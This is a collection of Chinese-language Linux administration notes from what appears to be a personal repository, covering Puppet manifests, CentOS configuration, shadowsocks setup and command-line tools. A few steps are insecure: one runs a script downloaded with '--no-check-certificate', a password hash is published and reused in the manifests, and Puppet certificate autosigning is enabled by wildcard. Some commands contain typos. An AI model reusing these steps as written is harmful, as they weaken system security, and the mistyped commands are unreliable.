56 | /etc/init.d/puppet reload #重新载入配置文件
57 | grep testgroup /etc/group #查看是否有testgroup组
58 |
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/puppet/puppetgao-ji-yong-fa-ff08-bian-cheng-yu-fa-ff09.md:
--------------------------------------------------------------------------------
1 | ###一、资源引用
2 |
3 | Type['title']
4 | 例如:Package['nginx']
5 | ###二、元参数
6 |
7 | 用于定义资源间的依赖关系,及应用次序,通知机制
8 | 特殊属性:
9 | require: #依赖
10 | package{'nginx':
11 | ensure => present,
12 | }
13 |
14 | service{'nginx':
15 | ensure => true,
16 | enable => true,
17 | require => Package['nginx'],
18 | }
19 |
20 | before:
21 | package {'nginx':
22 | ensure => present,
23 | before => Service['nginx'],
24 | }
25 |
26 | service {'nginx':
27 | ensure => true,
28 | enable => true,
29 | }
30 | notify和subscribe: #通知和订阅
31 | package {'nginx':
32 | ensure => present,
33 | } ->
34 |
35 | service {'nginx':
36 | ensure => true,
37 | enable => true,
38 | restart => '/etc/rc.d/init.d/nginx reload'
39 | }
40 |
41 |
42 |
43 | package{'nginx': } -> #依赖链
44 | file {'nginx.conf':} ~> #通知链
45 | service {'nginx':}
46 |
47 | Package['nginx'] -> File['nginx.conf'] ~> Service['nginx']
48 | ###三、变量
49 |
50 | 变量支持的类型:字符型、数值型、数组、布尔型、undef、hash、正则表达式
51 | 自定义变量:
52 |
53 | $pkgname='haproxy'
54 | package { $pkgname:
55 | ensure => present,
56 | }
57 |
58 | facter变量:查看 facter
59 |
60 | file {'/etc/issue.test':
61 | ensure => file,
62 | content => $operatingsystem,
63 | }
64 |
65 | 内置变量:
66 |
67 | agent: $environment, $clientcert, $clientversion
68 | masger: $serverip, $servername, $serverversion
69 |
70 | 变量作用域:
71 | puppet模块:
72 | 模块A:
73 | $test=hello
74 | 模块B:
75 | ###四、条件表达式
76 |
77 | 单分支、双分支、多分支
78 | If {
79 | }elsif{
80 |
81 | }else
82 | }
83 | ###五、函数
84 |
85 | if $operatingsystem =~ /^(?i-mx:(centos|redhat))/ {
86 | notice("Welcome to $1 linux,")
87 | }
88 | ###六、case语句
89 |
90 | case 和 selector实现同一种功能的示例:
91 |
92 | $webserver = $operatingsystem ? {
93 | /^(?i-mx:centos|fedora|redhat)/ => 'httpd',
94 | /^(?i-mx:ubuntu|debian)/ => 'apache2',
95 | }
96 | $webprovider = $operatingsystem ? {
97 | /^(?i-mx:centos|fedora|redhat)/ => 'yum',
98 | /^(?i-mx:ubuntu|debian)/ => 'apt',
99 | }
100 |
101 | package {"$webserver":
102 | ensure => present,
103 | provider => $webprovider,
104 | }
105 |
106 |
107 | case $operatingsystem {
108 | /^(?i-mx:redhat|centos|fedora)/: { package {'httpd': ensure => present, provider => yum, } }
109 | /^(?i-mx:ubuntu|debian)/: { package {'apache2': ensure => present, provider => apt, } }
110 | default: { notify {'notice': message => "unknown system.", }}
111 | }
112 |
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/puppet/puppetren-wu-ji-hua-guan-li.md:
--------------------------------------------------------------------------------
1 | ###一、添加任务计划
2 |
3 | vim /etc/puppet/mainfests/site.pp
4 | cron { 'ntp update':
5 | ensure => present,
6 | command => "ntpupdate ntp.time.com",
7 | user => "root",
8 | minute => "0",
9 | hour => "0",
10 | monthday => "*",
11 | month => '*',
12 | weekday => '*',
13 | }
14 | ###二、删除任务计划
15 |
16 | vim /etc/puppet/mainfests/site.pp
17 | cron { 'ntp update':
18 | ensure => absent,
19 | command => "ntpupdate ntp.time.com",
20 | user => "root",
21 | minute => "0",
22 | hour => "0",
23 | monthday => "*",
24 | month => '*',
25 | weekday => '*',
26 | }
27 |
28 |
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/puppet/puppetruan-jian-bao-guan-li.md:
--------------------------------------------------------------------------------
1 | ###一、安装软件包
2 |
3 | vim /etc/puppet/manifests/site.pp
4 | package { 'httpd':
5 | provider => yum,
6 | ensure => installed,
7 | }
8 | ###二、指定版本
9 |
10 | vim /etc/puppet/manifests/site.pp
11 | package { 'httpd':
12 | provider => yum,
13 | ensure => latest,
14 | }
15 | ###三、rpm安装
16 |
17 | vim /etc/puppet/manifests/site.pp
18 | package { 'epel-release':
19 | provider => rpm,
20 | ensure => installed,
21 | source => 'http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm',
22 | }
23 | ###四、卸载包
24 |
25 | vim /etc/puppet/manifests/site.pp
26 | package { 'httpd':
27 | provider => yum,
28 | ensure => purged,
29 |
30 | }
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/puppet/puppetyong-hu-guan-li.md:
--------------------------------------------------------------------------------
1 | ###一、用户管理
2 | - **生成用户秘钥:**
3 |
4 | grub-crypt --sha-512
5 | Password:
6 | Retype password:
7 | $6$lYIpu8h4TH7Nf0RM$3lUprHO3gy4XqmCwf0EMqyZjJz1alnISVEk0D/VV9pR3jVBhrzk/vysBRWaTfAZjiuYmc/OrPas8Hs8torqm91
8 | - **普通创建**
9 |
10 | vim /etc/puppet/manifests/site.pp
11 | user { 'longge':
12 | ensure => present,
13 | home => '/home/longge',
14 | managehome => true,
15 | password => '$6$lYIpu8h4TH7Nf0RM$3lUprHO3gy4XqmCwf0EMqyZjJz1alnISVEk0D/VV9pR3jVBhrzk/vysBRWaTfAZjiuYmc/OrPas8Hs8torqm91',
16 | }
17 |
18 | - **指定UID 制定GID指定组**
19 |
20 | group { 'longge':
21 | ensure => present,
22 | gid => 1000,
23 | }
24 | user { 'longge':
25 | ensure => present,
26 | home => '/home/longge',
27 | managehome => true,
28 | uid => 1000,
29 | gid => 1000,
30 | groups => ['longge', 'wheel'],
31 | password => '$6$lYIpu8h4TH7Nf0RM$3lUprHO3gy4XqmCwf0EMqyZjJz1alnISVEk0D/VV9pR3jVBhrzk/vysBRWaTfAZjiuYmc/OrPas8Hs8torqm91',
32 | }
33 | - **删除用户**
34 |
35 | user { 'longge':
36 | ensure => absent,
37 | home => '/home/longge',
38 | managehome => true,
39 | }
40 | ###二、用户组管理
41 | - **创建一个组**
42 |
43 | vim /etc/puppet/manifests/site.pp
44 | group { 'longge': ensure => present }
45 | - **创建一个组,指定GID**
46 |
47 | vi /etc/puppet/manifests/site.pp
48 | group { 'longge':
49 | ensure => present,
50 | gid => 1000,
51 | }
52 | - **删除一个组**
53 |
54 | vim /etc/puppet/manifests/site.pp
55 | group { 'longge': ensure => absent }
56 |
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/puppet/puppetzheng-shu-guan-li.md:
--------------------------------------------------------------------------------
1 | ###一、server端
2 |
3 | puppet cert list #查看请求认证的证书
4 | puppet cert list --all #查看所有证书
5 | puppet cert --sign client1.puppet.com #签发证书
6 | puppet cert --sign -all #一次签发所有的证书
7 | puppet cert --revoke puppet-test #让puppet-test 这个证书过期
8 | puppet cert --clean puppet-test #清除puppet-test 这个证书
9 | 清除配置需要重启puppetmaster 服务
10 | ###二、client 端
11 |
12 | - **删除已有的证书** `cd /var/lib/puppet/ssl && rm -rf *`
13 | - **重新申请证书 ** `puppet agent --server server.puppet.com --test`
14 |
15 | ###三、证书的认证过程
16 |
17 | puppet agent在第一次连接master的时候会向master申请证书,如果没有master没有签发证书,那么puppet agent和master的连接是否建立成功的,agent会持续等待master签发证书,并会每隔2分钟去检查master是否签发证书。
18 |
19 | 通过puppet agent --server= server.puppet.com --no-daemonize –verbose启动的时候能很清楚的查看到agent申请证书的过程
20 |
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/puppet/puppetzi-dong-zhu-ce.md:
--------------------------------------------------------------------------------
1 | ###一、配置自动注册规则
2 |
3 | **server端:**
4 |
5 | vim /etc/puppet/autosign.conf
6 | *.puppet.com #指定自动注册的域名范围(IP没验证,不确定)
7 | ###二、清除认证配置
8 |
9 | puppet cert list --all 查看
10 | puppet cert --clean client1.puppet.com # 清除制定配置
11 | ###三、清理客户端配置
12 |
13 | cd /var/lib/puppet/ssl && rm -rf *
14 | 重启服务
15 |
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/puppetan-zhuang.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/shi-3001-zi-dong-hua/puppetan-zhuang.md
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/saltstack.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/shi-3001-zi-dong-hua/saltstack.md
--------------------------------------------------------------------------------
/chapter1/shi-3001-zi-dong-hua/shell.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/shi-3001-zi-dong-hua/shell.md
--------------------------------------------------------------------------------
/chapter1/shi-er-3001-qi-ta.md:
--------------------------------------------------------------------------------
1 | # 跨域错误处理
2 |
3 | **错误信息:**
4 |
5 | Request header field authorization is not allowed by Access-Control-Allow-Headers in preflight response
6 |
7 | **解决方法:**
8 |
9 | #添加响应header
10 | header("Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Authorization");
--------------------------------------------------------------------------------
/chapter1/shi-er-3001-qi-ta/centos65-an-zhuang-python3-pip3.md:
--------------------------------------------------------------------------------
1 | # Centos6.5 安装Python3、pip3
2 |
3 | **1、安装python3**
4 |
5 | yum install python34 -y
6 | python3 -V
7 |
8 | **2、安装pip3**
9 |
10 | wget --no-check-certificate https://bootstrap.pypa.io/get-pip.py
11 | python3 get-pip.py
12 | pip3 -V
13 |
--------------------------------------------------------------------------------
/chapter1/shi-er-3001-qi-ta/centos7-grubxiu-fu.md:
--------------------------------------------------------------------------------
1 | # CentOS7 手动修复grub
2 |
3 | ### 1、找到boot分区
4 |
5 | 在`grub>` 下输入:
6 |
7 | ls
8 |
9 | (hd0),(hd0,msdos1),(hd0,msdos2),(hd0,msdos3)
10 |
11 | 查找`boot`分区:
12 |
13 | ls (hd0,msdos1)/boot/grub2
14 | ls (hd0,msdos2)/boot/grub2
15 | ls (hd0,msdos3)/boot/grub2
16 |
17 | 注意:一般情况下会在下 (hd0,msdos1)
18 | ### 2、手动引导进入系统
19 |
20 | #插入xfs模块
21 | grub> insmod xfs
22 |
23 | #设置boot分区
24 | grub> set root=(hd0,msdos1)
25 |
26 | #指定kernel内核和 根分区(注意:这里的根据实际情况的磁盘分区填写root字段)
27 | grub> linux16 /vmlinuz-xxxx root=/dev/sda3
28 |
29 | #指定init 程序
30 | grub> initrd16 /initramfs-xxx.img
31 |
32 | #启动
33 | grub> boot
34 |
35 | ### 3、修复grub
36 |
37 | sudo grub2-mkconfig -o /boot/grub2/grub.cfg
38 |
39 |
40 |
--------------------------------------------------------------------------------
/chapter1/shi-er-3001-qi-ta/centos7-xiu-gai-wang-qia-ming-wei-eth0.md:
--------------------------------------------------------------------------------
1 | # Centos7 修改网卡名为eth0
2 | ### 1、编辑网卡名
3 |
4 | vim /etc/sysconfig/network-scripts/ifcfg-enoxxxx
5 | NAME=eth0
6 |
7 | vim /etc/sysconfig/network-scripts/ifcfg-enoxxxx
8 | NAME=eth1
9 |
10 | cd /etc/sysconfig/network-scripts/
11 | mv ifcfg-enoxxxx eth0
12 | mv ifcfg-enoxxxx eth1
13 |
14 | ### 2、修改grub配置文件
15 |
16 | vim /etc/default/grub
17 | 添加 net.ifnames=0 biosdevname=0 至 GRUBCMDLINELINUX变量中
18 |
19 | 例如:
20 | #修改前
21 | GRUB_CMDLINE_LINUX="auto crashkernel=auto rhgb quiet"
22 | #修改后
23 | GRUB_CMDLINE_LINUX="auto crashkernel=auto biosdevname=0 net.ifnames=0 rhgb quiet"
24 |
25 | ### 3、重新生成grub配置
26 |
27 | grub2-mkconfig -o /boot/grub2/grub.cfg
28 |
29 | ### 4、重启机器
30 |
31 | reboot
32 |
33 | >注意:如果没生效 删除 /etc/udev/rules.d/XXX-net.rules 重启机器再试试
34 |
--------------------------------------------------------------------------------
/chapter1/shi-er-3001-qi-ta/jira.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/shi-er-3001-qi-ta/jira.md
--------------------------------------------------------------------------------
/chapter1/shi-er-3001-qi-ta/linux-huan-ying-ye-9762-motd.md:
--------------------------------------------------------------------------------
1 | ## linux欢迎页面 motd
2 | ### 一、 配置motd
3 |
4 | **1、配置欢迎页面**
5 |
6 | vim /etc/motd
7 | hello world!
8 |
9 | 登录效果:
10 | Last login: Tue Feb 19 13:48:28 2019 from 10.0.2.210
11 | hello world!
12 |
13 | **2、配置带颜色**
14 |
15 | echo -e "\033[31m hello world \033[0m" > /etc/motd
16 |
17 | #字体颜色:30m-37m 黑、红、绿、黄、蓝、紫、青、白
18 | str="hello world!"
19 | echo -e "\033[30m ${str}\033[0m" ## 黑色字体
20 | echo -e "\033[31m ${str}\033[0m" ## 红色
21 | echo -e "\033[32m ${str}\033[0m" ## 绿色
22 | echo -e "\033[33m ${str}\033[0m" ## 黄色
23 | echo -e "\033[34m ${str}\033[0m" ## 蓝色
24 | echo -e "\033[35m ${str}\033[0m" ## 紫色
25 | echo -e "\033[36m ${str}\033[0m" ## 青色
26 | echo -e "\033[37m ${str}\033[0m" ## 白色
27 |
28 |
29 | #背景颜色:40-47 黑、红、绿、黄、蓝、紫、青、白
30 | str="hello world!"
31 | echo -e "\033[41;37m ${str} \033[0m" ## 红色背景色,白色字体
32 | echo -e "\033[41;33m ${str} \033[0m" ## 红底黄字
33 | echo -e "\033[1;41;33m ${str} \033[0m" ## 红底黄字 高亮加粗显示
34 | echo -e "\033[5;41;33m ${str} \033[0m" ## 红底黄字 字体闪烁显示
35 | echo -e "\033[47;30m ${str} \033[0m" ## 白底黑字
36 | echo -e "\033[40;37m ${str} \033[0m" ## 黑底白字
37 |
38 |
39 | ### 二、常用motd
40 | **1、如来佛主,永不宕机**
41 |
42 | _ooOoo_
43 | o8888888o
44 | 88" . "88
45 | (| -_- |)
46 | O\ = /O
47 | ____/`---'\____
48 | .' \\| |// `.
49 | / \\||| : |||// \
50 | / _||||| -:- |||||- \
51 | | | \\\ - /// | |
52 | | \_| ''\---/'' | |
53 | \ .-\__ `-` ___/-. /
54 | ___`. .' /--.--\ `. . __
55 | ."" '< `.___\_<|>_/___.' >'"".
56 | | | : `- \`.;`\ _ /`;.`/ - ` : | |
57 | \ \ `-. \_ __\ /__ _/ .-` / /
58 | ======`-.____`-.___\_____/___.-`____.-'======
59 | `=---='
60 | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
61 | 佛祖保佑,永不宕机
62 |
63 | **2、自定义生成文字**
64 |
65 | #安装软件包
66 | yum -y install epel-release
67 | yum -y install figlet
68 |
69 | #生成文字
70 | figlet A B C
71 |
72 | _ ____ ____
73 | / \ | __ ) / ___|
74 | / _ \ | _ \ | |
75 | / ___ \ | |_) | | |___
76 | /_/ \_\ |____/ \____|
77 |
78 | #指定不同字体
79 | figlet -f smslant A B C
80 | ___ ___ _____
81 | / _ | / _ ) / ___/
82 | / __ | / _ | / /__
83 | /_/ |_| /____/ \___/
84 |
85 |
86 |
87 |
--------------------------------------------------------------------------------
/chapter1/shi-er-3001-qi-ta/linux-ji-chu-xin-xi-pei-zhi.md:
--------------------------------------------------------------------------------
1 | ## linux 基础配置
2 |
3 | ### 一、IP配置 ###
4 | 略
5 |
6 | ### 二、DNS配置 ###
7 | **1、配置在网卡文件**
8 |
9 | vim /etc/sysconfig/network-scripts/ifcfg-ethX
10 |
11 | DNS1=XXX
12 | DNS2=XXX
13 | **2、配置在公共配置**
14 |
15 | vim /etc/resolv.conf
16 |
17 | nameserver 223.5.5.5
18 | nameserver 223.6.6.6
19 |
20 | ### 三、配置主机名 ###
21 | **1、临时设置:** `hostname xxx`
22 |
23 |
24 | **2、永久生效**
25 |
26 | centos6:
27 | vim /etc/sysconfig/network
28 | NETWORKING=yes
29 | HOSTNAME=xxx
30 |
31 | centos7:
32 | vim /etc/hostname
33 | xxx
34 |
35 | ### 三、motd欢迎页面 ###
36 | **1、编辑配置 **
37 |
38 | vim /etc/motd
39 | hello world!
40 |
41 | **2、输出带颜色**
42 |
43 | echo -e "\033[34m hello world! \033[0m" >/etc/motd
44 |
45 |
46 |
47 | ### 四、时间同步 ###
48 | **1、临时同步:**`/usr/sbin/ntpdate -s ntp5.aliyun.com`
49 |
50 | **2、设置任务计划同步**
51 | - 配置任务计划
52 |
53 |
54 | crontab -e
55 | */10 * * * * (/usr/sbin/ntpdate -s ntp5.aliyun.com && /sbin/hwclock -w) > /dev/null &
56 |
57 | - 重启任务计划
58 |
59 |
60 | centos65:
61 | /etc/init.d/crond restart
62 | centos75:
63 | systemctl restart crond
64 |
65 | ### 五、时区 ###
66 | **1、编辑配置**
67 |
68 | # vim /etc/sysconfig/clock
69 | ZONE="Asia/Shanghai"
70 |
71 | **2、生效配置**
72 |
73 | source /etc/sysconfig/clock
74 |
75 | **3、其他方法**
76 | # cp -p /usr/share/zoneinfo/Asia/Shanghai /etc/localtime
77 | cp: overwrite `/etc/localtime'? y
78 |
79 |
80 | ### 六、键盘 ###
81 | **1、编辑配置**
82 |
83 | # vim /etc/sysconfig/keyboard
84 | KEYTABLE="us"
85 | MODEL="pc105+inet"
86 | LAYOUT="us"
87 | KEYBOARDTYPE="pc"
88 |
89 | **2、生效配置**
90 |
91 | source /etc/sysconfig/keyboard
92 |
93 | ### 七、语言 ###
94 |
95 | # vim /etc/sysconfig/i18n
96 | LANG="en_US.UTF-8"
97 | SYSFONT="latarcyrheb-sun16"
98 |
99 | source /etc/sysconfig/i18n
100 |
101 | echo $LANG
102 |
103 | ### 八、ssh免密钥 ###
104 | **1、生成密钥 **
105 |
106 | #被信任机器上执行
107 | ssh-keygen -t rsa
108 | 一路回车
109 |
110 | **2、互信**
111 |
112 | ssh-copy-id root@IP
113 |
114 |
115 | ### 九、PS1环境格式 ###
116 |
117 | vim /etc/bashrc
118 |
119 | #最后一行添加
120 | export PS1='\[\e[37;0m\][\[\e[32;36m\]\u\[\e[37;32m\]@\h \[\e[36;33m\]\w\[\e[0m\]]\n\$ '
121 |
--------------------------------------------------------------------------------
/chapter1/shi-er-3001-qi-ta/nali-shi-yong.md:
--------------------------------------------------------------------------------
1 | # Nali 工具使用 #
2 |
3 |
4 | ### 一、安装 ###
5 | #解压包
6 | tar xf nali-0.2.tar.gz
7 | cd nali-0.2
8 | ./configure
9 | make && make install
10 |
11 |
12 | ### 二、使用手册 ###
13 | **1、添加环境变量**
14 |
15 | vim /etc/proflie.d/nali.sh
16 | PATH=$PATH:/usr/local/nali/bin/
17 |
18 | #重新加载变量
19 | source /etc/profile.d/nali.sh
20 |
21 | **2、更新IP数据库**
22 |
23 | 手动更新
24 | nali-update
25 |
26 | 设置定时更新:每天1点更新
27 | crontab -e
28 | ------
29 | #更新IP库
30 | 0 1 * * * nali-update
31 |
32 | **3、nali命令**
33 |
34 | [root@rsync-node1 share]# nali 202.106.0.20
35 | 202.106.0.20[北京市 联通DNS服务器]
36 |
37 | **4、nali-dig 命令**
38 |
39 | [root@rsync-node1 share]# nali-dig www.baidu.com
40 | ; <<>> DiG 9.8.2rc1-RedHat-9.8.2-0.47.rc1.el6 <<>> www.baidu.com
41 | ;; global options: +cmd
42 | ;; Got answer:
43 | ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48659
44 | ;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 0
45 |
46 | ;; QUESTION SECTION:
47 | ;www.baidu.com. IN A
48 |
49 | ;; ANSWER SECTION:
50 | www.baidu.com. 980 IN CNAME www.a.shifen.com.
51 | www.a.shifen.com. 36 IN A 61.135.169.125[北京市 百度蜘蛛]
52 | www.a.shifen.com. 36 IN A 61.135.169.121[北京市 百度蜘蛛]
53 |
54 | ;; Query time: 92 msec
55 | ;; SERVER: 202.106.0.20[北京市 联通DNS服务器]#53(202.106.0.20[北京市 联通DNS服务器])
56 | ;; WHEN: Thu Apr 27 11:38:32 2017
57 | ;; MSG SIZE rcvd: 90
58 |
59 |
60 | **5、nali-nslookup 命令**
61 |
62 | [root@rsync-node1 share]# nali-nslookup www.baidu.com
63 | Server: 202.106.0.20[北京市 联通DNS服务器]
64 | Address: 202.106.0.20[北京市 联通DNS服务器]#53
65 |
66 | Non-authoritative answer:
67 | www.baidu.com canonical name = www.a.shifen.com.
68 | Name: www.a.shifen.com
69 | Address: 61.135.169.121[北京市 百度蜘蛛]
70 | Name: www.a.shifen.com
71 | Address: 61.135.169.125[北京市 百度蜘蛛]
72 |
73 | **6、nali-traceroute 命令**
74 |
75 | [root@rsync-node1 share]# nali-traceroute www.baidu.com
76 | traceroute to www.baidu.com (61.135.169.125[北京市 百度蜘蛛]), 30 hops max, 60 byte packets
77 | 1 bogon (192.168.160.2[局域网 对方和您在同一内部网]) 0.172 ms 0.146 ms 0.131 ms
78 | 2 * * *
79 | 3 * * *
80 |
81 | **7、nali-tracepath 命令**
82 |
83 | [root@rsync-node1 share]# nali-tracepath www.baidu.com
84 | 1?: [LOCALHOST] pmtu 1500
85 | 1: bogon (192.168.160.2[局域网 对方和您在同一内部网]) 0.163ms
86 | 2: no reply
87 | 3: no reply
88 |
89 |
90 |
91 | **8、nali-ping 命令**
92 |
93 | [root@rsync-node1 httpd]# nali-ping www.baidu.com
94 | PING www.a.shifen.com (61.135.169.121[北京市 百度蜘蛛]) 56(84) bytes of data.
95 | 64 bytes from 61.135.169.121[北京市 百度蜘蛛]: icmp_seq=1 ttl=128 time=36.3 ms
96 | 64 bytes from 61.135.169.121[北京市 百度蜘蛛]: icmp_seq=2 ttl=128 time=37.8 ms
97 | 64 bytes from 61.135.169.121[北京市 百度蜘蛛]: icmp_seq=3 ttl=128 time=42.1 ms
98 | 64 bytes from 61.135.169.121[北京市 百度蜘蛛]: icmp_seq=4 ttl=128 time=40.4 ms
99 |
100 |
101 | **9、其他调用**
102 |
103 | [root@rsync-node1 httpd]# ping www.baidu.com | nali
104 | PING www.a.shifen.com (61.135.169.121[北京市 百度蜘蛛]) 56(84) bytes of data.
105 | 64 bytes from 61.135.169.121[北京市 百度蜘蛛]: icmp_seq=1 ttl=128 time=46.0 ms
106 | 64 bytes from 61.135.169.121[北京市 百度蜘蛛]: icmp_seq=2 ttl=128 time=44.2 ms
107 | 64 bytes from 61.135.169.121[北京市 百度蜘蛛]: icmp_seq=3 ttl=128 time=47.8 ms
108 | 64 bytes from 61.135.169.121[北京市 百度蜘蛛]: icmp_seq=4 ttl=128 time=48.6 ms
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
--------------------------------------------------------------------------------
/chapter1/shi-er-3001-qi-ta/ranger文件管理器.md:
--------------------------------------------------------------------------------
1 | # ranger 文件管理器
2 |
3 | ## 一、 安装ranger
4 |
5 | brew install ranger
6 |
7 | ## 二、 基础操作
8 | 1、查看帮助
9 |
10 | ? 或 F1
11 |
12 | 2、移动
13 |
14 | 上 j
15 | 下 k
16 | 左 h
17 | 右 l
18 |
19 | 上页 ctrl + b/u
20 | 下页 ctrl + f/d
21 |
22 |
23 | 首行 gg
24 | 尾行 G
25 |
26 | 前进 L
27 | 后退 H
28 | 上级目录 h
29 | 下级目录 l
30 |
31 | 查找 f
32 | 搜索 /
33 | 查找下一个 n
34 | 查找上一个 N
35 |
36 |
37 | 3、 文件管理
38 |
39 | 新建目录/文件 :touch xxx
40 | 删除目录/文件 dD
41 | 修改目录/文件 cw/I/A
42 | 复制目录/文件 yy
43 | 粘贴目录/文件 pp
44 | 剪切目录/文件 dd
45 | 刷新目录/文件 R
46 |
47 | 4、文件选择
48 |
49 | 单选 空格
50 | 反选 v
51 | 多选模式 V
52 |
53 | 5、终端管理
54 |
55 | 新建终端 gn
56 | 切换终端 gt/gT
57 | 关闭终端 gc
58 |
59 | 6、调用shell
60 |
61 | !/ @ / S
62 |
63 | ## 三、安装其他文件类型预览支持
64 | 1、html
65 |
66 | brew install elinks
67 | brew install w3m
68 |
69 | 2、多媒体
70 |
71 | brew install media-info
72 |
73 | 3、图片
74 |
75 |
76 | 4、doc
77 |
78 | 5、xlsx
79 |
80 | 6、语法高亮
81 |
82 | brew install highlight
83 |
84 | ## 四、其他配置
85 | 1、配置文件分类
86 |
87 | commands.py 能通过 : 执行的命令
88 | commands_full.py 能通过 : 执行的命令,但这个更全
89 | rc.conf 选项设置和快捷键
90 | rifle.conf 指定不同类型的文件的默认打开程序
91 | scope.sh 当 use_preview_script = true,这个脚本会被调用
92 |
93 | 2、自定义按键
94 |
95 | vim ~/.config/ranger/rc.conf
96 | #删除到垃圾文件
97 | map DD shell mv %s ~/.Trash
98 | #快速跳转到指定目录
99 | map gw cd ~/root/
100 |
101 | 3、开启图片预览
102 |
103 | vim ~/.config/ranger/rc.conf
104 | # 预览图片
105 | set preview_images true
106 | # 使用什么方法来预览图片
107 | set preview_images_method iterm2
108 |
109 | 4、配置颜色
110 |
111 | vim ~/.config/ranger/rc.conf
112 |
113 | set colorscheme jungle
114 | #有四个颜色可以选: default 、snow、jungle、solarized
115 |
116 |
117 | 5、参考站点
118 | - https://www.52gvim.com/post/ranger-tool-usage
119 | - https://wiki.archlinux.org/index.php/ranger_(简体中文)
120 |
121 |
--------------------------------------------------------------------------------
/chapter1/shi-er-3001-qi-ta/redmin-fu-wu.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/a3231945/linux/cc8eb3d2030b5cb1376b848ffeedce5a8837600d/chapter1/shi-er-3001-qi-ta/redmin-fu-wu.md
--------------------------------------------------------------------------------
/chapter1/shi-er-3001-qi-ta/screen-qing-chu-yi-ge-detached-hui-hua.md:
--------------------------------------------------------------------------------
1 |
2 | ### 1、查看会话
3 |
4 | # screen -ls
5 | There is a screen on:
6 | 185512.checkice (Detached)
7 | 1 Socket in /var/run/screen/S-root.
8 |
9 |
10 |
11 | ### 2、清除会话
12 |
13 | **方法一:**
14 |
15 | # screen -X -S 185512 quit
16 |
17 | 验证结果:
18 | # screen -ls
19 | No Sockets found in /var/run/screen/S-root.
20 |
21 |
22 | 语法: screen -X -S ID quit
23 |
24 | **方法二:**
25 |
26 | screen -r ID/NAME
27 | 并利用exit退出并kiil掉session。
28 |
29 | 例如:
30 |
31 | # screen -ls
32 | There is a screen on:
33 | 5694.test (Detached)
34 | 1 Socket in /var/run/screen/S-root.
35 |
36 | # screen -r 5694
37 | [screen is terminating]
38 | =====>进入screen会话输入:exit 或 按快捷键 ctrl + D 退出
39 |
40 | # screen -ls
41 | No Sockets found in /var/run/screen/S-root.
42 |
43 |
44 |
45 |
--------------------------------------------------------------------------------
/chapter1/shi-er-3001-qi-ta/ss-fan-qiang-fu-wu.md:
--------------------------------------------------------------------------------
1 | ###一、安装软件包
2 |
3 | yum -y install python-pip
4 |
5 | pip install --upgrade pip
6 | pip install shadowsocks
7 |
8 | ###二、定义配置文件
9 |
10 | vim /etc/shadowsocks.json
11 | {
12 | "server":"172.104.xxx.xxx",
13 | "server_port":18388,
14 | "local_address": "127.0.0.1",
15 | "local_port":10801,
16 | "password": {
17 | "8000":"XXXX",
18 | "8001":"XXXX"
19 | }
20 | "timeout":300,
21 | "method":"aes-256-cfb",
22 | "fast_open": false,
23 | "workers": 1
24 | }
25 |
26 | * [ ] **注意: 指定服务器自己的IP和密码**
27 |
28 |
29 | ###三、服务管理
30 |
31 | #启动
32 | ssserver -c /etc/shadowsocks.json -d start
33 |
34 | #停止
35 | ssserver -c /etc/shadowsocks.json -d stop
36 |
37 | #重启
38 | ssserver -c /etc/shadowsocks.json -d restart
39 |
40 | ### 四、客户端使用
41 |
42 | 略
43 |
--------------------------------------------------------------------------------
/chapter1/shi-er-3001-qi-ta/vim-cha-jian.md:
--------------------------------------------------------------------------------
1 | ### Vim 插件管理
2 |
3 |
4 | ### 一、安装vim-plugin
5 |
6 |
7 | curl -fLo ~/.vim/autoload/plug.vim --create-dirs https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim
8 |
9 | ### 二、安装插件
10 |
11 | - **安装 nerdtree**
12 |
13 | #vim ~/.vimrc
14 |
15 | call plug#begin('~/.vim/plugged')
16 | Plug 'scrooloose/nerdtree'
17 | call plug#end()
18 |
19 | map :NERDTreeMirror
20 | map :NERDTreeToggle
21 |
22 | #vim
23 | :PlugInstall
24 |
25 |
26 | - **安装 vim-markdown **
27 |
28 |
29 | #vim ~/.vimrc
30 | call plug#begin('~/.vim/plugged')
31 | Plug 'godlygeek/tabular'
32 | Plug 'plasticboy/vim-markdown'
33 | call plug#end()
34 |
35 | #vim
36 | :PlugInstall
--------------------------------------------------------------------------------
/chapter1/shi-er-3001-qi-ta/wget-shi-yong.md:
--------------------------------------------------------------------------------
1 | ### Wget使用
2 | ####一、常用使用方法
3 | **1、下载单个文件**
4 |
5 | wget http://URL
6 |
7 | **2、将下载的文件重命名**
8 |
9 | wget http://URL -O name
10 |
11 | **3、下载限速**
12 |
13 | wget --limit-rage=128k http://URL
14 |
15 | **4、断点续传**
16 |
17 | wget -c http://URL
18 |
19 | **5、后台下载**
20 |
21 | wget -b http://URL
22 |
23 | **6、指定UA**
24 |
25 | wget --user-agent="my ua" http://URL
26 |
27 | **7、测试目标文件**
28 |
29 | wget --spider http://URL
30 |
31 | **8、设置重试次数**
32 |
33 | wget --tries=5 http://URL
34 |
35 | **9、批量下载**
36 |
37 | vim url.txt
38 | URL1
39 | URL2
40 |
41 | wget -i url.txt
42 |
43 | **10、下载整个网站**
